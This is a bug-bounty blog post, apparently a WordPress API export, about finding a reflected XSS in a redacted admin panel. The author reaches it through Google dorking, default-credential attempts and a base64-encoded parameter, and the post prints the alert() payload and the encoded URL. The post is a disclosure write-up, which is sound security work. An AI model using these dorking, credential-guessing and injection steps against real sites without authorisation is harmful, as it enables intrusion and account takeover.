{"id":164,"date":"2022-08-15T00:06:26","date_gmt":"2022-08-14T22:06:26","guid":{"rendered":"https:\/\/bergee.it\/blog\/?p=164"},"modified":"2022-09-07T09:08:25","modified_gmt":"2022-09-07T07:08:25","slug":"five-minute-hunting-for-hidden-xss","status":"publish","type":"post","link":"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/","title":{"rendered":"Five-minute hunting for hidden XSS"},"content":{"rendered":"<p>One night I was about to go to sleep, however, set the goal of finding the bug within a max of 15 minutes. I did some google dorking like this:<\/p>\n<blockquote><p>site:*.target.com ext:php<\/p><\/blockquote>\n<p>I found the site with an admin panel on it. I tried to log in with some common credentials combinations such as admin\/admin, admin\/test, test\/test, etc., but nothing worked. I\u00a0 got the message: &#8220;Inloggen \/ Log In ((failed))&#8221;. I was about to give up here as I don&#8217;t like to brute force the credentials, as I saw GET parameter named e which was BASE64 encoded string. I decoded it and saw the following string:<\/p>\n<blockquote class=\"wrapped\"><p>start.php?do=start|(failed)|b56dd8df284556c4440f747fe770680f7a011<\/p><\/blockquote>\n<p>Hmm, the same &#8220;(failed)&#8221; was visible after failed login. Now you may guess the rest :). What if I change this &#8220;(failed)&#8221; part of the string into XSS payload &#8220;&lt;img src=x onerror=alert(document.domain)&gt;&#8221;, so the string will be:<\/p>\n<blockquote class=\"wrapped\"><p>start.php?do=start|&lt;img src=x onerror=alert(document.domain)&gt;|b56dd8df284556c4440f747fe770680f7a011<\/p><\/blockquote>\n<p>After encoding to base64 it would be:<\/p>\n<blockquote class=\"wrapped\"><p>c3RhcnQucGhwP2RvPXN0YXJ0fDxpbWcgc3JjPXggb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPnxiNTZkZDhkZjI4NDU1NmM0NDQwZjc0N2ZlNzcwNjgwZjdhMDExZmFj<\/p><\/blockquote>\n<p>So the final URL was:<\/p>\n<blockquote class=\"wrapped\"><p>https:\/\/redacted.com\/admin\/index.php?e=c3RhcnQucGhwP2RvPXN0YXJ0fDxpbWcgc3JjPXggb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPnxiNTZkZDhkZjI4NDU1NmM0NDQwZjc0N2ZlNzcwNjgwZjdhMDExZmFj<\/p><\/blockquote>\n<p>And guess what? It worked. I managed to get reflected XSS. Now I know, in this case, it was pretty easy escalable to account takeover, however I stopped on XSS back then.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-168 \" src=\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted.jpg\" alt=\"\" width=\"1624\" height=\"529\" srcset=\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted.jpg 1970w, https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted-300x98.jpg 300w, https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted-1024x334.jpg 1024w, https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted-768x250.jpg 768w, https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted-1536x501.jpg 1536w, https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted-850x277.jpg 850w\" sizes=\"auto, (max-width: 1624px) 100vw, 1624px\" \/><\/p>\n<p>Reward: Hall Of Fame<\/p>\n<p>See you next bug \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"<p>One night I was about to go to sleep, however, set the goal of finding the bug within a max of 15 minutes. I did some google dorking like this: site:*.target.com ext:php I found the site with an admin panel on it. I tried to log in with some common credentials combinations such as admin\/admin,&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1,33,29],"tags":[],"class_list":["post-164","post","type-post","status-publish","format-standard","hentry","category-bez-kategorii","category-vdp","category-write-up"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Five-minute hunting for hidden XSS - Bergee&#039;s Stories on Bug Hunting<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Five-minute hunting for hidden XSS - Bergee&#039;s Stories on Bug Hunting\" \/>\n<meta property=\"og:description\" content=\"One night I was about to go to sleep, however, set the goal of finding the bug within a max of 15 minutes. I did some google dorking like this: site:*.target.com ext:php I found the site with an admin panel on it. I tried to log in with some common credentials combinations such as admin\/admin,...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/\" \/>\n<meta property=\"og:site_name\" content=\"Bergee&#039;s Stories on Bug Hunting\" \/>\n<meta property=\"article:published_time\" content=\"2022-08-14T22:06:26+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-09-07T07:08:25+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted.jpg\" \/>\n<meta name=\"author\" content=\"bergee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/bergee\" \/>\n<meta name=\"twitter:site\" content=\"@bergee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"bergee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/\"},\"author\":{\"name\":\"bergee\",\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\"},\"headline\":\"Five-minute hunting for hidden XSS\",\"datePublished\":\"2022-08-14T22:06:26+00:00\",\"dateModified\":\"2022-09-07T07:08:25+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/\"},\"wordCount\":287,\"publisher\":{\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\"},\"image\":{\"@id\":\"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted.jpg\",\"articleSection\":[\"Bez kategorii\",\"vdp\",\"write-up\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/\",\"url\":\"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/\",\"name\":\"Five-minute hunting for hidden XSS - Bergee&#039;s Stories on Bug Hunting\",\"isPartOf\":{\"@id\":\"https:\/\/bergee.it\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted.jpg\",\"datePublished\":\"2022-08-14T22:06:26+00:00\",\"dateModified\":\"2022-09-07T07:08:25+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/#primaryimage\",\"url\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted.jpg\",\"contentUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted.jpg\",\"width\":1970,\"height\":642},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/bergee.it\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Five-minute hunting for hidden XSS\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/bergee.it\/blog\/#website\",\"url\":\"https:\/\/bergee.it\/blog\/\",\"name\":\"Bergee&#039;s Stories on Bug Hunting\",\"description\":\"hacking, cyber security and programming\",\"publisher\":{\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/bergee.it\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\",\"name\":\"bergee\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\",\"url\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\",\"contentUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\",\"width\":129,\"height\":150,\"caption\":\"bergee\"},\"logo\":{\"@id\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\"},\"sameAs\":[\"http:\/\/localhost\/wordpress\",\"https:\/\/www.linkedin.com\/in\/bartlomiej-bergier\",\"https:\/\/x.com\/https:\/\/twitter.com\/bergee\"],\"url\":\"https:\/\/bergee.it\/blog\/author\/bergee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Five-minute hunting for hidden XSS - Bergee&#039;s Stories on Bug Hunting","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/","og_locale":"en_US","og_type":"article","og_title":"Five-minute hunting for hidden XSS - Bergee&#039;s Stories on Bug Hunting","og_description":"One night I was about to go to sleep, however, set the goal of finding the bug within a max of 15 minutes. I did some google dorking like this: site:*.target.com ext:php I found the site with an admin panel on it. I tried to log in with some common credentials combinations such as admin\/admin,...","og_url":"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/","og_site_name":"Bergee&#039;s Stories on Bug Hunting","article_published_time":"2022-08-14T22:06:26+00:00","article_modified_time":"2022-09-07T07:08:25+00:00","og_image":[{"url":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted.jpg","type":"","width":"","height":""}],"author":"bergee","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/bergee","twitter_site":"@bergee","twitter_misc":{"Written by":"bergee","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/#article","isPartOf":{"@id":"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/"},"author":{"name":"bergee","@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73"},"headline":"Five-minute hunting for hidden XSS","datePublished":"2022-08-14T22:06:26+00:00","dateModified":"2022-09-07T07:08:25+00:00","mainEntityOfPage":{"@id":"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/"},"wordCount":287,"publisher":{"@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73"},"image":{"@id":"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/#primaryimage"},"thumbnailUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted.jpg","articleSection":["Bez kategorii","vdp","write-up"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/","url":"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/","name":"Five-minute hunting for hidden XSS - Bergee&#039;s Stories on Bug Hunting","isPartOf":{"@id":"https:\/\/bergee.it\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/#primaryimage"},"image":{"@id":"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/#primaryimage"},"thumbnailUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted.jpg","datePublished":"2022-08-14T22:06:26+00:00","dateModified":"2022-09-07T07:08:25+00:00","breadcrumb":{"@id":"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/#primaryimage","url":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted.jpg","contentUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/xss_base64_redacted.jpg","width":1970,"height":642},{"@type":"BreadcrumbList","@id":"https:\/\/bergee.it\/blog\/five-minute-hunting-for-hidden-xss\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/bergee.it\/blog\/"},{"@type":"ListItem","position":2,"name":"Five-minute hunting for hidden XSS"}]},{"@type":"WebSite","@id":"https:\/\/bergee.it\/blog\/#website","url":"https:\/\/bergee.it\/blog\/","name":"Bergee&#039;s Stories on Bug Hunting","description":"hacking, cyber security and programming","publisher":{"@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/bergee.it\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":["Person","Organization"],"@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73","name":"bergee","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png","url":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png","contentUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png","width":129,"height":150,"caption":"bergee"},"logo":{"@id":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png"},"sameAs":["http:\/\/localhost\/wordpress","https:\/\/www.linkedin.com\/in\/bartlomiej-bergier","https:\/\/x.com\/https:\/\/twitter.com\/bergee"],"url":"https:\/\/bergee.it\/blog\/author\/bergee\/"}]}},"_links":{"self":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts\/164","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/comments?post=164"}],"version-history":[{"count":8,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts\/164\/revisions"}],"predecessor-version":[{"id":180,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts\/164\/revisions\/180"}],"wp:attachment":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/media?parent=164"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/categories?post=164"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/tags?post=164"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}